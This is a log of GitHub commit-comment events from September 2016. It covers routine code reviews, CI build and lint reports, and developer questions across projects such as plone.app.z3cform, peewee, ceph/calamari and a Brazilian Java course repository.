{"id":"4637542653","type":"CommitCommentEvent","actor":{"login":"dpeddi"},"repo":{"name":"oe-alliance/oe-alliance-settings"},"payload":{"comment":{"id":19224526,"position":null,"line":null,"path":null,"commit_id":"a6943ddfd7a2fc1f31bdce5c228d302936deeb27","created_at":"2016-09-29T14:19:55Z","updated_at":"2016-09-29T14:19:55Z","body":"what wo you mean for nobody maintain them? you need that somehone have to download package from vhannibal site and add to git? I can do so"}},"created_at":"2016-09-29T14:19:55Z"}
{"id":"4637549821","type":"CommitCommentEvent","actor":{"login":"coleifer"},"repo":{"name":"coleifer/peewee"},"payload":{"comment":{"id":19224542,"position":null,"line":null,"path":null,"commit_id":"3260a9797ae217024cda1e963b8c5c2c9dec5ab2","created_at":"2016-09-29T14:21:03Z","updated_at":"2016-09-29T14:21:03Z","body":"I have no idea why I did this. Damn!"}},"created_at":"2016-09-29T14:21:03Z"}
{"id":"4637550333","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19224544,"position":null,"line":null,"path":null,"commit_id":"79a7a35ab5dfb82c66a8849751c8324d49402d87","created_at":"2016-09-29T14:21:08Z","updated_at":"2016-09-29T14:21:08Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1195](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14553&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 235, ignored: 3 Build time: 00:12:26\n### Failed tests\n```\norg.genivi.sota.device_registry.GroupsResourceSpec.creating groups is possible: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-29T14:21:08Z"}
{"id":"4637551924","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.z3cform"},"payload":{"comment":{"id":19224546,"position":null,"line":null,"path":null,"commit_id":"4ae827f13f39bbab57074b48f316b15a6a072742","created_at":"2016-09-29T14:21:22Z","updated_at":"2016-09-29T14:21:22Z","body":"@mauritsvanrees Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.app.z3cform/48/violations\n```\nplone/__init__.py:0:1: C101 Coding magic comment not found\nplone/app/__init__.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/converters.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/csrf.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/inline_validation.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/inline_validation.py:14:1: C901 'InlineValidationView.__call__' is too complex (12)\nplone/app/z3cform/inline_validation.py:23:12: P002 found \"hasattr\", consider replacing it\nplone/app/z3cform/inline_validation.py:25:16: P002 found \"hasattr\", consider replacing it\nplone/app/z3cform/inline_validation.py:29:26: Q000 Remove bad quotes.\nplone/app/z3cform/inline_validation.py:34:9: E265 block comment should start with '# '\nplone/app/z3cform/inline_validation.py:41:17: E731 do not assign a lambda expression, use a def\nplone/app/z3cform/interfaces.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/interfaces.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/interfaces.py:6:80: E501 line too long (85 > 79 characters)\nplone/app/z3cform/layout.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/layout.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/layout.py:2:1: F401 'FormWrapper' imported but unused\nplone/app/z3cform/layout.py:2:1: F401 'wrap_form' imported but unused\nplone/app/z3cform/object.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/object.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/templates.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/templates.py:13:1: E731 do not assign a lambda expression, use a def\nplone/app/z3cform/utils.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/utils.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/widget.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/widget.py:7:80: E501 line too long (83 > 79 characters)\nplone/app/z3cform/widget.py:147:29: Q000 Remove bad quotes.\nplone/app/z3cform/widget.py:338:80: E501 line too long (84 > 79 characters)\nplone/app/z3cform/widget.py:359:26: Q000 Remove bad quotes.\nplone/app/z3cform/widget.py:359:27: S001 found %s formatter\nplone/app/z3cform/widget.py:444:80: E501 line too long (84 > 79 characters)\nplone/app/z3cform/widget.py:453:80: E501 line too long (84 > 79 characters)\nplone/app/z3cform/widget.py:456:30: Q000 Remove bad quotes.\nplone/app/z3cform/widget.py:456:31: S001 found %s formatter\nplone/app/z3cform/widget.py:535:58: Q000 Remove bad quotes.\nplone/app/z3cform/widget.py:584:35: P101 format string does contain unindexed parameters\nplone/app/z3cform/widget.py:595:42: P101 format string does contain unindexed parameters\nplone/app/z3cform/widget.py:596:44: P101 format string does contain unindexed parameters\nplone/app/z3cform/widget.py:598:34: P101 format string does contain unindexed parameters\nplone/app/z3cform/widget.py:621:28: P101 format string does contain unindexed parameters\nplone/app/z3cform/tests/example.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/tests/example.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/tests/example.py:16:16: Q000 Remove bad quotes.\nplone/app/z3cform/tests/layer.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/tests/layer.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/tests/layer.py:33:10: Q000 Remove bad quotes.\nplone/app/z3cform/tests/test_csrf.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/tests/test_objectsubform.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/tests/test_objectsubform.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/tests/test_objectsubform.py:34:35: S001 found %s formatter\nplone/app/z3cform/tests/test_widget.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/tests/test_widget.py:32:80: E501 line too long (126 > 79 characters)\nplone/app/z3cform/tests/test_widgets.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/tests/test_widgets.py:549:14: D001 found assertEquals replace it with assertEqual\nplone/app/z3cform/tests/test_widgets.py:552:14: D001 found assertEquals replace it with assertEqual\nplone/app/z3cform/tests/test_widgets.py:769:36: D001 found directlyProvides replace it with zope.interface.provider\nplone/app/z3cform/tests/test_widgets.py:771:9: D001 found directlyProvides replace it with zope.interface.provider\nplone/app/z3cform/tests/test_widgets.py:893:80: E501 line too long (89 > 79 characters)\nplone/app/z3cform/tests/test_widgets.py:902:80: E501 line too long (90 > 79 characters)\nplone/app/z3cform/tests/test_widgets.py:1105:14: D001 found assertEquals replace it with assertEqual\nplone/app/z3cform/tests/test_widgets.py:1144:80: E501 line too long (81 > 79 characters)\nplone/app/z3cform/tests/test_widgets.py:1167:80: E501 line too long (82 > 79 characters)\nplone/app/z3cform/tests/test_widgets.py:1253:14: D001 found assertEquals replace it with assertEqual\nplone/app/z3cform/tests/test_widgets.py:1268:14: D001 found assertEquals replace it with assertEqual\nplone/app/z3cform/tests/test_widgets.py:1276:39: Q000 Remove bad quotes.\nplone/app/z3cform/tests/tests.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/tests/tests.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/queryselect/__init__.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/queryselect/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/queryselect/__init__.py:17:21: Q000 Remove bad quotes.\nplone/app/z3cform/queryselect/__init__.py:17:80: E501 line too long (97 > 79 characters)\nplone/app/z3cform/queryselect/__init__.py:18:21: Q000 Remove bad quotes.\nplone/app/z3cform/wysiwyg/__init__.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/wysiwyg/__init__.py:2:1: F401 'WysiwygFieldWidget' imported but unused\nplone/app/z3cform/wysiwyg/widget.py:0:1: C101 Coding magic comment not found\nplone/app/z3cform/wysiwyg/widget.py:0:1: I001 isort found changes, run it on the file\nplone/app/z3cform/wysiwyg/widget.py:43:17: Q000 Remove bad quotes.\nplone/app/z3cform/wysiwyg/widget.py:43:80: E501 line too long (84 > 79 characters)\nplone/app/z3cform/wysiwyg/widget.py:44:17: Q000 Remove bad quotes.\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-29T14:21:22Z"}
{"id":"4637553571","type":"CommitCommentEvent","actor":{"login":"antoligy"},"repo":{"name":"kaliop/ezdocker-stack"},"payload":{"comment":{"id":19224551,"position":12,"line":12,"path":"config/apache/sites-available/002-dynamic-vhost-ezplatform.conf","commit_id":"9f4733f4393f4f1a5da8fe6061c9583f3a6e0b6a","created_at":"2016-09-29T14:21:37Z","updated_at":"2016-09-29T14:21:37Z","body":"tab!"}},"created_at":"2016-09-29T14:21:37Z"}
{"id":"4637557364","type":"CommitCommentEvent","actor":{"login":"jtanx"},"repo":{"name":"fontforge/fontforge.github.io"},"payload":{"comment":{"id":19224558,"position":12,"line":24,"path":"en-US/downloads/windows.md","commit_id":"48ca596da97fe7dfcc2d0df9c2296307f727ae44","created_at":"2016-09-29T14:22:13Z","updated_at":"2016-09-29T14:22:13Z","body":"Hmm. I'm not sure I like how many clicks it takes to get the download link. At present, it *looks* like you *must* subscribe to get the download, even though submitting with an empty address apparently works. \r\n\r\nAt the least, I think it would be better to also supply just a plain old link next to the subscribe button to go to the download without needing to submit an email."}},"created_at":"2016-09-29T14:22:13Z"}
{"id":"4637559997","type":"CommitCommentEvent","actor":{"login":"b1conrad"},"repo":{"name":"Picolab/node-pico-engine"},"payload":{"comment":{"id":19224566,"position":null,"line":null,"path":null,"commit_id":"7a3de2659675c0092075973105e780e924094297","created_at":"2016-09-29T14:22:37Z","updated_at":"2016-09-29T14:22:37Z","body":"the class \"js-test\" is no longer used with a link"}},"created_at":"2016-09-29T14:22:37Z"}
{"id":"4637561669","type":"CommitCommentEvent","actor":{"login":"zphj1987"},"repo":{"name":"ceph/calamari"},"payload":{"comment":{"id":19224571,"position":null,"line":null,"path":null,"commit_id":"8b7c7b01a63cb5e29f527c162e0f2a4ad3f5be4f","created_at":"2016-09-29T14:22:52Z","updated_at":"2016-09-29T14:22:52Z","body":"build-rpm.sh will use calamari.spec \r\nbut now calamari-server.spec.in,how can i generate calamari.spec? cp the file?\r\n@b-ranto "}},"created_at":"2016-09-29T14:22:52Z"}
{"id":"4637562560","type":"CommitCommentEvent","actor":{"login":"AhmedMustafa"},"repo":{"name":"samarsultan/node-red"},"payload":{"comment":{"id":19224573,"position":27,"line":139,"path":"editor/js/text/bidi.js","commit_id":"f37db1ddade437217ced371217f8edee45c481c0","created_at":"2016-09-29T14:23:00Z","updated_at":"2016-09-29T14:23:00Z","body":"plz remove '//'"}},"created_at":"2016-09-29T14:23:00Z"}
{"id":"4637563742","type":"CommitCommentEvent","actor":{"login":"seejessicacode"},"repo":{"name":"techlahoma/thunderplains-2016"},"payload":{"comment":{"id":19224576,"position":247,"line":247,"path":"themes/thunderplains/source/stylesheets/tito.styl","commit_id":"bc3c56cfb51e29928d885618634670cd27861a6a","created_at":"2016-09-29T14:23:11Z","updated_at":"2016-09-29T14:23:11Z","body":"change margin-top to 0 may fix #48\r\n\r\nOnly tested on IE 11"}},"created_at":"2016-09-29T14:23:11Z"}
{"id":"4637566476","type":"CommitCommentEvent","actor":{"login":"dg4prez"},"repo":{"name":"Comcast/traffic_control"},"payload":{"comment":{"id":19224586,"position":null,"line":null,"path":null,"commit_id":"fb0cf0cac6bf298a4b0ee5c699b3fd3e28d9bf9f","created_at":"2016-09-29T14:23:36Z","updated_at":"2016-09-29T14:23:36Z","body":"This commit appears to resolve the slow config file generation issue found when certain cachegroups were set to org_loc."}},"created_at":"2016-09-29T14:23:36Z"}
{"id":"4637567933","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"ArthurLDS/crescer-2016-2"},"payload":{"comment":{"id":19224589,"position":5,"line":14,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"2a2ed8bb0e3640ae51ffa6d3dcfa5bfab1a9997a","created_at":"2016-09-29T14:23:49Z","updated_at":"2016-09-29T14:23:49Z","body":"Assumindo que a lógica está correta, e ela não está, fica mais correto fazer:\r\n\r\n```Java\r\nreturn ano % 4 == 0;\r\n```"}},"created_at":"2016-09-29T14:23:49Z"}
{"id":"4637572522","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"ArthurLDS/crescer-2016-2"},"payload":{"comment":{"id":19224595,"position":4,"line":13,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"2a2ed8bb0e3640ae51ffa6d3dcfa5bfab1a9997a","created_at":"2016-09-29T14:24:32Z","updated_at":"2016-09-29T14:24:32Z","body":"Leia mais sobre o algoritmo de cálculo de ano bissexto, existem outras situações que precisam ser previstas (ex: 1900 é múltiplo de 4 e não é ano bissexto)."}},"created_at":"2016-09-29T14:24:32Z"}
{"id":"4637572654","type":"CommitCommentEvent","actor":{"login":"bazarco"},"repo":{"name":"aspnet/EntityFramework6"},"payload":{"comment":{"id":19224596,"position":7,"line":87,"path":"src/EntityFramework/Core/Mapping/FunctionImportMappingComposableHelper.cs","commit_id":"b4cb2b17ac24a611719b18cb3c890b59d076a290","created_at":"2016-09-29T14:24:33Z","updated_at":"2016-09-29T14:24:33Z","body":"... and there is no way to import FunctionImportResultMapping into model because of this changes"}},"created_at":"2016-09-29T14:24:33Z"}
{"id":"4637573453","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"lisabee2/final_project"},"payload":{"comment":{"id":19224600,"position":55,"line":48,"path":"final_LL/contact/contact.html","commit_id":"a81265a65b6901ec4ddfd073541be1a8a65ffe5c","created_at":"2016-09-29T14:24:41Z","updated_at":"2016-09-29T14:24:41Z","body":"fun fact: when you include the name of the tag in the id attribute, you're using a variation of something called \"hungarian notation\""}},"created_at":"2016-09-29T14:24:41Z"}
{"id":"4637575902","type":"CommitCommentEvent","actor":{"login":"GabrielSanchezC"},"repo":{"name":"GabrielSanchezC/project"},"payload":{"comment":{"id":19224603,"position":1,"line":1,"path":"README","commit_id":"619bc12b37dbf5f9c87514aac8f97a2791f57641","created_at":"2016-09-29T14:25:03Z","updated_at":"2016-09-29T14:25:03Z","body":"bien"}},"created_at":"2016-09-29T14:25:03Z"}
{"id":"4637576033","type":"CommitCommentEvent","actor":{"login":"rhcarvalho"},"repo":{"name":"sclorg/mongodb-container"},"payload":{"comment":{"id":19224604,"position":47,"line":47,"path":"2.4/examples/petset/README.md","commit_id":"70fd83a8f8c74a1e5162f27852e81fdb2f3b7aea","created_at":"2016-09-29T14:25:05Z","updated_at":"2016-09-29T14:25:05Z","body":"I was thinking specifically \"OpenShift project\", because that's what governs the lifetime (I need to remove the space there) of the resources deployed with this example template. The word \"project\" alone seems a bit too broad to me, maybe I'm being to strict, what did you have in mind?"}},"created_at":"2016-09-29T14:25:05Z"}
{"id":"4637578092","type":"CommitCommentEvent","actor":{"login":"marcomorain"},"repo":{"name":"joshdholtz/Sentry-Android"},"payload":{"comment":{"id":19224610,"position":36,"line":242,"path":"sentry-android/src/main/java/com/joshdholtz/sentry/Sentry.java","commit_id":"07b84c7146d5c4cb38762a6bd13b2543785493bf","created_at":"2016-09-29T14:25:22Z","updated_at":"2016-09-29T14:25:22Z","body":"@tutipeti we have pushed 1.5.1 with fix for this."}},"created_at":"2016-09-29T14:25:22Z"}
{"id":"4637578346","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"lisabee2/final_project"},"payload":{"comment":{"id":19224613,"position":65,"line":65,"path":"final_LL/contact/css/contact.css","commit_id":"a81265a65b6901ec4ddfd073541be1a8a65ffe5c","created_at":"2016-09-29T14:25:25Z","updated_at":"2016-09-29T14:25:25Z","body":"looks like this should be a class."}},"created_at":"2016-09-29T14:25:25Z"}
{"id":"4637582077","type":"CommitCommentEvent","actor":{"login":"AhmedMustafa"},"repo":{"name":"samarsultan/node-red"},"payload":{"comment":{"id":19224621,"position":167,"line":167,"path":"editor/js/text/numeric-shaping.js","commit_id":"f37db1ddade437217ced371217f8edee45c481c0","created_at":"2016-09-29T14:25:59Z","updated_at":"2016-09-29T14:25:59Z","body":"if we really need those three lines, then move them to another function e.g. '_refreshView'"}},"created_at":"2016-09-29T14:25:59Z"}
{"id":"4637586127","type":"CommitCommentEvent","actor":{"login":"bracketttc"},"repo":{"name":"bracketttc/poco"},"payload":{"comment":{"id":19224632,"position":null,"line":null,"path":null,"commit_id":"df8e0929083621ad4ed8359e3690efa38a300a27","created_at":"2016-09-29T14:26:34Z","updated_at":"2016-09-29T14:26:34Z","body":"I didn't realize that there was still an autotools build system living alongside the CMake one. I haven't done any package maintenance for the major linux distributions; is that a requirement for debian and fedora packages?\r\n\r\nWith that in mind, it's not really an option to convert entirely over to using a CMake configure_file.\r\n\r\nI don't think replacing a file in the source tree for a build configuration change is a good idea. It increases the likelihood that someone will accidentally commit a build option that they're using to a branch in the repository.\r\n\r\nOther than replacing the file in the source tree, the only way I know of to override an included file would be to separate that file in the source tree and change include paths to use that or the configure_file.\r\n\r\nIf it's acceptable, I could move the Config.h and Config.h.in to a dedicated directory and then based on `POCO_GENERATE_CONFIG_H` choose whether to include the pristine Config.h from the source tree or the build-specific configure_file in the binary directory."}},"created_at":"2016-09-29T14:26:34Z"}
{"id":"4637586684","type":"CommitCommentEvent","actor":{"login":"hyanying"},"repo":{"name":"TechLadies/mutts-rescue"},"payload":{"comment":{"id":19224634,"position":1,"line":1,"path":"app/views/home/home.html.erb","commit_id":"7597e46de76f145a177717af5b2eada7c4716386","created_at":"2016-09-29T14:26:39Z","updated_at":"2016-09-29T14:26:39Z","body":"Line 1-47 (excluding the CSS) should be be in app/views/layouts/application.html.erb and removed from this file. \r\n\r\nIf I am not wrong, \"home.html.erb\" is a partial view. On the browser side, this would be displayed as a section where the \"<%= yield %>\" code is in the \"application.html.erb\" file. HTML tags defining the document type <!DOCTYPE> and body <body> are already provided by default in the \"application.html.erb\" and should be amended there as well.\r\n\r\nExternal JS files <script src=\"..xyz.js\"></script> are usually placed at the bottom of the HTML before </body> for faster loading time (or so they say...)\r\n\r\n(On another note, if <body> tag is opened, there should be a closed </body> at the bottom as well.)"}},"created_at":"2016-09-29T14:26:39Z"}
{"id":"4637589596","type":"CommitCommentEvent","actor":{"login":"b-ranto"},"repo":{"name":"ceph/calamari"},"payload":{"comment":{"id":19224638,"position":null,"line":null,"path":null,"commit_id":"8b7c7b01a63cb5e29f527c162e0f2a4ad3f5be4f","created_at":"2016-09-29T14:27:07Z","updated_at":"2016-09-29T14:27:07Z","body":"@zphj1987 Hi, we do it like this\r\n\r\nhttps://github.com/ceph/ceph-build/blob/master/calamari-setup/build/build#L43\r\n\r\nYou can also check out\r\n\r\nhttps://github.com/ceph/ceph-build/blob/master/calamari-build/build/build_rpm\r\n\r\nfor build steps."}},"created_at":"2016-09-29T14:27:07Z"}
{"id":"4637593893","type":"CommitCommentEvent","actor":{"login":"php-coder"},"repo":{"name":"sclorg/mongodb-container"},"payload":{"comment":{"id":19224649,"position":47,"line":47,"path":"2.4/examples/petset/README.md","commit_id":"70fd83a8f8c74a1e5162f27852e81fdb2f3b7aea","created_at":"2016-09-29T14:27:47Z","updated_at":"2016-09-29T14:27:47Z","body":"I was reading quickly and thought that you're talking about user's project."}},"created_at":"2016-09-29T14:27:47Z"}
{"id":"4637595734","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"ArthurLDS/crescer-2016-2"},"payload":{"comment":{"id":19224656,"position":23,"line":29,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"74ed279e4270408d216875c49c63b63b61854242","created_at":"2016-09-29T14:28:03Z","updated_at":"2016-09-29T14:28:03Z","body":"Cuidado, é perigoso comparar strings com `==`."}},"created_at":"2016-09-29T14:28:03Z"}
{"id":"4637596685","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"ArthurLDS/crescer-2016-2"},"payload":{"comment":{"id":19224657,"position":20,"line":26,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"74ed279e4270408d216875c49c63b63b61854242","created_at":"2016-09-29T14:28:11Z","updated_at":"2016-09-29T14:28:11Z","body":"Cuidado, `n` não é um bom nome."}},"created_at":"2016-09-29T14:28:11Z"}
{"id":"4637597310","type":"CommitCommentEvent","actor":{"login":"FrechMax"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19224660,"position":5,"line":36,"path":"tests/de.ovgu.featureide.fm.core-test/src/de/ovgu/featureide/fm/core/io/xml/TXMLFeatureModelReaderWriter.java","commit_id":"6b0022c6b2046c2dbefb3f202cda464b0ad3a887","created_at":"2016-09-29T14:28:16Z","updated_at":"2016-09-29T14:28:16Z","body":"Ddscription added :+1: "}},"created_at":"2016-09-29T14:28:16Z"}
{"id":"4637598864","type":"CommitCommentEvent","actor":{"login":"davisking"},"repo":{"name":"mit-nlp/MITIE"},"payload":{"comment":{"id":19224664,"position":33,"line":1057,"path":"mitielib/include/mitie.h","commit_id":"f0202c02836f3ba8c04c72bd0e558084d49a154f","created_at":"2016-09-29T14:28:30Z","updated_at":"2016-09-29T14:28:30Z","body":"How many things are in the array? :)\r\n\r\nThese comments should contain all the information needed to correctly use the function.  "}},"created_at":"2016-09-29T14:28:30Z"}
{"id":"4637601205","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"lisabee2/final_project"},"payload":{"comment":{"id":19224671,"position":130,"line":86,"path":"final_LL/contact/contact.html","commit_id":"a81265a65b6901ec4ddfd073541be1a8a65ffe5c","created_at":"2016-09-29T14:28:52Z","updated_at":"2016-09-29T14:28:52Z","body":"double check your css and js paths on all your pages. It looks like you reorganized some files and the paths broke. "}},"created_at":"2016-09-29T14:28:52Z"}
{"id":"4637602897","type":"CommitCommentEvent","actor":{"login":"bompeacock"},"repo":{"name":"bompeacock/TodoApp"},"payload":{"comment":{"id":19224673,"position":null,"line":null,"path":null,"commit_id":"c36526c2ffff5e7309411236be77813976b46845","created_at":"2016-09-29T14:29:06Z","updated_at":"2016-09-29T14:29:06Z","body":" #Pre-work: Schedule App\r\n\r\nSchedule App is an android app that allows building a todo list and basic todo items management functionality including adding new items, editing and deleting an existing item.\r\n\r\nSubmitted by: Nguyen Van Cong\r\n\r\nTime spent: Three days spent in total\r\n\r\n#User Stories\r\n\r\nThe following **required** functionality is completed:\r\n\r\n*  User can **sort view Level or Date** from the todo list\r\n*  User can **successfully add and remove items** from the todo list\r\n*  User can **tap a todo item in the list and bring up an edit screen for the todo item** and then have any changes to the text reflected in the todo list.\r\n* User can **persist todo items** and retrieve them properly on app restart\r\n\r\nThe following **optional** features are implemented:\r\n\r\n* [ ] Persist the todo items [into SQLite](http://guides.codepath.com/android/Persisting-Data-to-the-Device#sqlite) instead of a text file\r\n* [ ] Improve style of the todo items in the list [using a custom adapter](http://guides.codepath.com/android/Using-an-ArrayAdapter-with-ListView)\r\n* [ ] Add support for completion due dates for todo items (and display within listview item)\r\n* [ ] Use a [DialogFragment](http://guides.codepath.com/android/Using-DialogFragment) instead of new Activity for editing items\r\n* [ ] Add support for selecting the priority of each todo item (and display in listview item)\r\n* [ ] Tweak the style improving the UI / UX, play with colors, images or backgrounds\r\n\r\nThe following **additional** features are implemented:\r\n\r\n* [ ] List anything else that you can get done to improve the app functionality!\r\n\r\n## Video Walkthrough \r\n\r\nHere's a walkthrough of implemented user stories:\r\n\r\n<img src='http://i.imgur.com/link/to/your/gif/file.gif' title='Video Walkthrough' width='' alt='Video Walkthrough' />\r\n\r\nGIF created with [LiceCap](http://www.cockos.com/licecap/).\r\n\r\n"}},"created_at":"2016-09-29T14:29:06Z"}
{"id":"4637603338","type":"CommitCommentEvent","actor":{"login":"AhmedMustafa"},"repo":{"name":"samarsultan/node-red"},"payload":{"comment":{"id":19224674,"position":5,"line":129,"path":"editor/js/ui/common/tabs.js","commit_id":"f37db1ddade437217ced371217f8edee45c481c0","created_at":"2016-09-29T14:29:10Z","updated_at":"2016-09-29T14:29:10Z","body":"!!"}},"created_at":"2016-09-29T14:29:10Z"}
{"id":"4637607061","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19224681,"position":null,"line":null,"path":null,"commit_id":"7e9b228122a4f79f4fbb773b8aaaf43ade742010","created_at":"2016-09-29T14:29:43Z","updated_at":"2016-09-29T14:29:43Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1196](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14558&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T14:29:43Z"}
{"id":"4637607380","type":"CommitCommentEvent","actor":{"login":"lautr3k"},"repo":{"name":"openhardwarecoza/LaserWeb4"},"payload":{"comment":{"id":19224684,"position":null,"line":null,"path":null,"commit_id":"28e35bcd683316fca3fc6e6e11d0d086d86cd99d","created_at":"2016-09-29T14:29:46Z","updated_at":"2016-09-29T14:29:46Z","body":"Thanks :) "}},"created_at":"2016-09-29T14:29:46Z"}
{"id":"4637609045","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":19224687,"position":null,"line":null,"path":null,"commit_id":"01ebde96e629a0ee2358a1691a3efeb933ed441b","created_at":"2016-09-29T14:30:02Z","updated_at":"2016-09-29T14:30:02Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 439](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1269&buildTypeId=XbimEssentials_XbimEssentials) is now running\n"}},"created_at":"2016-09-29T14:30:02Z"}
{"id":"4637611353","type":"CommitCommentEvent","actor":{"login":"rhcarvalho"},"repo":{"name":"sclorg/mongodb-container"},"payload":{"comment":{"id":19224692,"position":23,"line":23,"path":"2.4/examples/petset/README.md","commit_id":"70fd83a8f8c74a1e5162f27852e81fdb2f3b7aea","created_at":"2016-09-29T14:30:22Z","updated_at":"2016-09-29T14:30:22Z","body":"Updated."}},"created_at":"2016-09-29T14:30:22Z"}
{"id":"4637612182","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"lisabee2/final_project"},"payload":{"comment":{"id":19224694,"position":79,"line":94,"path":"final_LL/css/style.css","commit_id":"a81265a65b6901ec4ddfd073541be1a8a65ffe5c","created_at":"2016-09-29T14:30:29Z","updated_at":"2016-09-29T14:30:29Z","body":"I encourage you to try and use rems for your margins. You'll be able to have a much more elastic layout as you style your various breakpoints. "}},"created_at":"2016-09-29T14:30:29Z"}
{"id":"4637613875","type":"CommitCommentEvent","actor":{"login":"zijistark"},"repo":{"name":"EMFTeam/EMF"},"payload":{"comment":{"id":19224699,"position":53,"line":520,"path":"EMF/events/emf_mongol.txt","commit_id":"f546d7dc11e6bb0a95dc157783f905fa27371b30","created_at":"2016-09-29T14:30:43Z","updated_at":"2016-09-29T14:30:43Z","body":"since some time's passed here w/o any response, I went ahead and fixed this myself. I wasn't sure if there was some kind of oversight which I was making, but I guess not. resolved. ✅ "}},"created_at":"2016-09-29T14:30:43Z"}
{"id":"4637613980","type":"CommitCommentEvent","actor":{"login":"FrechMax"},"repo":{"name":"FeatureIDE/FeatureIDE"},"payload":{"comment":{"id":19224700,"position":13,"line":213,"path":"plugins/de.ovgu.featureide.fm.ui/src/de/ovgu/featureide/fm/ui/editors/FeatureUIHelper.java","commit_id":"eebd336d32d2babab284d431d27bd459aee1c902","created_at":"2016-09-29T14:30:44Z","updated_at":"2016-09-29T14:30:44Z","body":"Helpful comment :+1: "}},"created_at":"2016-09-29T14:30:44Z"}
{"id":"4637616204","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19224709,"position":null,"line":null,"path":null,"commit_id":"2e4fb4a90cad062ef6d2de43d6cab80e5d1a7a06","created_at":"2016-09-29T14:31:04Z","updated_at":"2016-09-29T14:31:04Z","body":"Thanks :)"}},"created_at":"2016-09-29T14:31:04Z"}
{"id":"4637617364","type":"CommitCommentEvent","actor":{"login":"rhcarvalho"},"repo":{"name":"sclorg/mongodb-container"},"payload":{"comment":{"id":19224718,"position":72,"line":72,"path":"2.4/examples/petset/README.md","commit_id":"70fd83a8f8c74a1e5162f27852e81fdb2f3b7aea","created_at":"2016-09-29T14:31:13Z","updated_at":"2016-09-29T14:31:13Z","body":"Fixed, thank you!"}},"created_at":"2016-09-29T14:31:13Z"}
{"id":"4637618651","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"lisabee2/final_project"},"payload":{"comment":{"id":19224723,"position":285,"line":144,"path":"final_LL/css/style.css","commit_id":"a81265a65b6901ec4ddfd073541be1a8a65ffe5c","created_at":"2016-09-29T14:31:26Z","updated_at":"2016-09-29T14:31:26Z","body":"Be careful using ems for your margins as they're a little more unpredictable than rems. Good job staying away from px values here. "}},"created_at":"2016-09-29T14:31:26Z"}
